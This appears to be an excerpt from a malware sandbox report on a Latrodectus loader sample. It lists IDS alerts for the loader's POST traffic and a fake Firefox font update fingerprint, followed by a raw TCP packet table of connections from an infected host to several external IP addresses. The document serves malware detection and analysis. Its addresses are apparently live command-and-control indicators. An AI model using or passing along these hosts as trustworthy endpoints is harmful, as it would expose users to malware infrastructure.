2024-11-13T18:22:18.399575+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.6 | 50018 | 104.21.92.105 | 443 | TCP
2024-11-13T18:22:19.737666+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50019 | 104.21.15.162 | 443 | TCP
                                                                                                                                          2024-11-13T18:22:19.739101+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650019104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:21.409128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650020104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:21.410907+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650020104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:23.039590+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650021104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:23.041999+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650021104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:24.805613+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650022104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:24.807513+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650022104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:26.173414+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650023104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:26.178401+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650023104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:27.540954+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650024104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:27.543087+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650024104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:28.687333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650025104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:28.689063+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650025104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:29.900602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650026104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:29.905136+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650026104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:31.429651+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650027104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:31.431657+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650027104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:33.096565+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650028104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:33.098757+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650028104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:34.500030+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650030104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:34.501612+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650030104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:35.673101+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650032104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:35.678117+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650032104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:37.181142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650033104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:37.183209+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650033104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:39.892991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650034104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:39.894562+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650034104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:41.066186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650035104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:41.067957+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650035104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:42.478083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650036104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:42.480274+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650036104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:44.268059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650037104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:44.269690+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650037104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:45.547937+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650038104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:45.550809+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650038104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:47.040842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650039104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:47.043304+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650039104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:48.238909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650040104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:48.240620+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650040104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:49.532459+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650041104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:49.534433+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650041104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:51.299788+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650042104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:51.301944+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650042104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:52.434082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650043104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:52.435848+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650043104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:53.735864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650044104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:53.737613+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650044104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:55.151098+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650045104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:55.153007+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650045104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:57.103138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650046104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:57.105060+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650046104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:22:58.946530+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650047104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:22:58.971880+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650047104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:00.285448+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650048104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:00.287129+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650048104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:01.834162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650049104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:01.835907+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650049104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:03.439760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650050104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:03.441860+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650050104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:04.744340+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650051104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:04.746138+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650051104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:06.367173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650053104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:06.367358+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650053104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:07.792039+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650054104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:07.797628+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650054104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:09.034125+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650055104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:09.036279+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650055104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:10.241740+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650056104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:10.244065+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650056104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:11.469710+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650057104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:11.471628+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650057104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:12.752330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650058104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:12.753942+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650058104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:14.697821+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650059104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:14.700323+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650059104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:16.145916+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650061104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:16.169310+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650061104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:17.621379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650062104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:17.623742+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650062104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:19.190901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650063104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:19.192979+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650063104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:20.884938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650064104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:20.886689+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650064104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:22.316802+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650065104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:22.318351+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650065104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:23.601065+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650066104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:23.603206+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650066104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:24.783669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650067104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:24.785334+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650067104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:26.057648+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650068104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:26.059590+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650068104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:27.930928+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650069104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:27.932558+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650069104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:29.432946+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650070104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:29.434900+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650070104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:30.836937+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650071104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:30.907646+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650071104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:32.368537+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650072104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:32.370472+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650072104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:33.673410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650074104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:33.675075+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650074104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:35.075522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650075104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:35.965995+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650076104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:35.978016+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650076104.21.15.162443TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                          Nov 13, 2024 18:20:11.993767023 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993767023 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993801117 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994736910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994771957 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994805098 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994831085 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994839907 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994848967 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994878054 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994884014 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994904041 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994914055 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994946003 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994946003 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994947910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994982958 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995007992 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995043039 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995069981 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995102882 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995152950 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995186090 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995218039 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995250940 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995285034 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995351076 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995471954 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995922089 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995973110 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995978117 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996006966 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996066093 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996082067 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996082067 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996098995 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996133089 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996165037 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996222973 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996370077 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996371031 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997195005 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997231960 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997268915 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997291088 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997317076 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997324944 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997337103 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997366905 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997390032 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997400045 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997435093 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089565992 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089596987 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089618921 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089705944 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089808941 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089924097 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089982033 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.091049910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.091097116 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.091172934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.109945059 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.109982014 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110007048 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110033035 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110047102 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110066891 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110102892 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110121012 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110160112 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110179901 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110193968 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110217094 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110228062 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110234976 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110260963 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110274076 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110317945 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110455036 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110487938 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110521078 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110521078 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110548019 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110554934 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110589027 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110596895 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110598087 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110671997 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110780954 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110831976 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110882998 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110884905 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110896111 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110919952 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110927105 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110956907 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110992908 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111077070 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111274958 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111309052 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111330032 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111360073 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111382961 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111433983 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111454010 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111468077 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111502886 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111529112 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111529112 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111537933 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111563921 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111573935 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111592054 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111608028 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111639977 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111639977 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111947060 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:38.413924932 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.413960934 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:38.416524887 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.416840076 CET49990443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:21:38.416851997 CET44349990104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:39.299232960 CET44349990104.21.92.105192.168.2.6
